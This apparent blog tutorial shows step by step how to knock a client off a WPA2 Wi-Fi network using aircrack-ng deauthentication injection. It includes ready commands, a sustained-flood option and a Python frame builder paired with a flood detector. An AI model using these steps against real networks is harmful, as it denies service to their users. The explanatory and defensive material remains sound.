Thursday, May 27, 2010

Forcefully disconnect a wireless client

Is it possible to disconnect a wireless client from a network that uses strong encryption such as WPA2? Yes. The frames that do it are 802.11 deauthentication frames, and deauthentication is a management frame: it is sent in the clear and is not authenticated, so the network key protects the data traffic but not the disconnect. (802.11w Protected Management Frames close this gap, but only when both the access point and the client support them.) I've been messing around with the aircrack-ng suite of tools (again) recently and decided to dive deeper into its capabilities. In a past blog post I wrote briefly about aircrack-ng and cracking WEP keys. I didn't speak in depth about its features then but would like to add a little bit more. This time I'll be showing some commands that I've used to disconnect one of my wireless laptops, using a netbook that wasn't even authenticated or connected to my wireless router. What this means is that anyone can do a drive-by in their car and forcefully disconnect me from my wireless router, causing a denial of service. The denial of service is brief, since the wireless clients will usually try to reconnect automatically, but it lasts exactly as long as the attacker keeps sending the frames.

First turn your wireless card into monitor mode:
# airmon-ng start wlan0

Then scan the air for wireless AP's and clients
# airodump-ng mon0

When you've found an access point with a client connected, narrow the scan to that AP. This also locks the interface onto that channel, which the injection in the next step needs: aireplay-ng's frames have to go out on the channel the AP and client are actually using. The client's MAC address shows up in the STATION column of the output:
# airodump-ng --channel 9 --bssid aa:aa:aa:aa:aa:aa mon0

And finally, the injection of deauthentication frames:
# aireplay-ng -a aa:aa:aa:aa:aa:aa -c bb:bb:bb:bb:bb:bb --deauth 1 mon0

'-a' is the MAC address (BSSID) of the target access point
'-c' is the MAC address of the target client, taken from the STATION column above; leave it out and aireplay-ng broadcasts the deauth to every client of that AP
'--deauth 1' sends one round of deauth frames; '--deauth 0' keeps sending until you stop it, which is what turns the brief disconnect into a sustained denial of service

The frames are forged with the access point's own MAC address as the source, and nothing in the protocol lets the client tell them from the real thing unless both sides use 802.11w protected management frames.
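To show what those frames actually look like on the air, here is an added example (mine, not from the original post and not aircrack-ng code) that builds the raw 802.11 deauthentication frame sent in each direction of a deauth round and then parses frames back out, the way a wireless IDS would to spot a deauth flood. It uses only the Python standard library and never touches a radio. The MAC addresses are the placeholders from the commands above, the burst size of 64 frames per direction is an assumption loosely modelled on aireplay-ng's output, and reason code 7 is an assumed value (the reason field is unauthenticated, so an attacker can put anything there).

```python
"""
Forge and recognise 802.11 deauthentication frames (added example, pure stdlib).

Everything here is constructed in memory: no radio, no monitor-mode interface.
MAC addresses are the placeholders used in the blog post's commands.
"""
import struct
from collections import Counter

MGMT_TYPE = 0            # 802.11 frame type: management
DEAUTH_SUBTYPE = 12      # management subtype: deauthentication
PROTECTED_FLAG = 0x40    # "Protected Frame" bit in the second frame-control byte
REASON_CLASS3 = 7        # assumed reason code: class 3 frame from non-associated STA

# Header layout, little-endian: frame control (2), duration (2),
# addr1 (6), addr2 (6), addr3 (6), sequence control (2) = 24 bytes.
HDR_FMT = "<BBH6s6s6sH"
HDR_LEN = struct.calcsize(HDR_FMT)


def mac_to_bytes(mac: str) -> bytes:
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"bad MAC address: {mac!r}")
    return bytes(int(p, 16) for p in parts)


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(bssid: str, client: str, to_client: bool = True,
                 reason: int = REASON_CLASS3, seq: int = 0) -> bytes:
    """Return a raw deauthentication frame (without the radio-added FCS).

    to_client=True forges AP -> client; False forges client -> AP. Either way
    the frame carries only addresses and a reason code: there is no field for
    a key or integrity check, which is why the WPA2 passphrase is irrelevant.
    """
    fc = (DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2)   # 0xC0, protocol version 0
    flags = 0                                        # Protected bit clear
    duration = 0x013A                                # NAV value, arbitrary here
    addr1, addr2 = (client, bssid) if to_client else (bssid, client)
    header = struct.pack(HDR_FMT, fc, flags, duration,
                         mac_to_bytes(addr1), mac_to_bytes(addr2),
                         mac_to_bytes(bssid), (seq & 0x0FFF) << 4)
    return header + struct.pack("<H", reason)


def deauth_burst(bssid: str, client: str, rounds: int = 1,
                 per_direction: int = 64) -> list:
    """Frames for `rounds` deauth rounds: each round sends per_direction frames
    AP->client and per_direction frames client->AP (assumed burst size)."""
    frames = []
    seq = 0
    for _ in range(rounds):
        for _ in range(per_direction):
            frames.append(build_deauth(bssid, client, True, seq=seq))
            frames.append(build_deauth(bssid, client, False, seq=seq))
            seq = (seq + 1) & 0x0FFF
    return frames


def parse_deauth(frame: bytes):
    """Return a dict describing the frame if it is a deauthentication frame,
    otherwise None. Works on the bare 802.11 frame (no radiotap header)."""
    if len(frame) < HDR_LEN + 2:
        return None
    fc, flags, _duration, a1, a2, a3, seq_ctrl = struct.unpack_from(HDR_FMT, frame, 0)
    if ((fc >> 2) & 0x3) != MGMT_TYPE or ((fc >> 4) & 0xF) != DEAUTH_SUBTYPE:
        return None
    (reason,) = struct.unpack_from("<H", frame, HDR_LEN)
    return {
        "dst": bytes_to_mac(a1),
        "src": bytes_to_mac(a2),
        "bssid": bytes_to_mac(a3),
        "seq": seq_ctrl >> 4,
        "reason": reason,
        "protected": bool(flags & PROTECTED_FLAG),   # set only under 802.11w
    }


def detect_deauth_flood(frames, threshold: int = 10) -> dict:
    """Count unprotected deauth frames per (bssid, dst) and return the pairs
    at or above `threshold`. Protected (802.11w) deauths are skipped because
    a forger without the keys cannot produce a valid one."""
    counts = Counter()
    for frame in frames:
        info = parse_deauth(frame)
        if info and not info["protected"]:
            counts[(info["bssid"], info["dst"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    AP, STA = "aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb"
    one = build_deauth(AP, STA)
    print(f"{len(one)}-byte deauth frame:", one.hex())
    print(parse_deauth(one))
    for pair, n in detect_deauth_flood(deauth_burst(AP, STA)).items():
        print(f"deauth flood: {n} frames from BSSID {pair[0]} to {pair[1]}")
```

The point the bytes make: a 26-byte frame with three addresses and a reason code, with no key, no MIC, nothing derived from the network passphrase. The Protected Frame bit (0x40 in the flags byte) is what 802.11w sets when management frames are authenticated; a monitor-mode sensor that sees unprotected deauth frames carrying its own BSSID as source, dozens at a time aimed at one client, is watching this attack.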
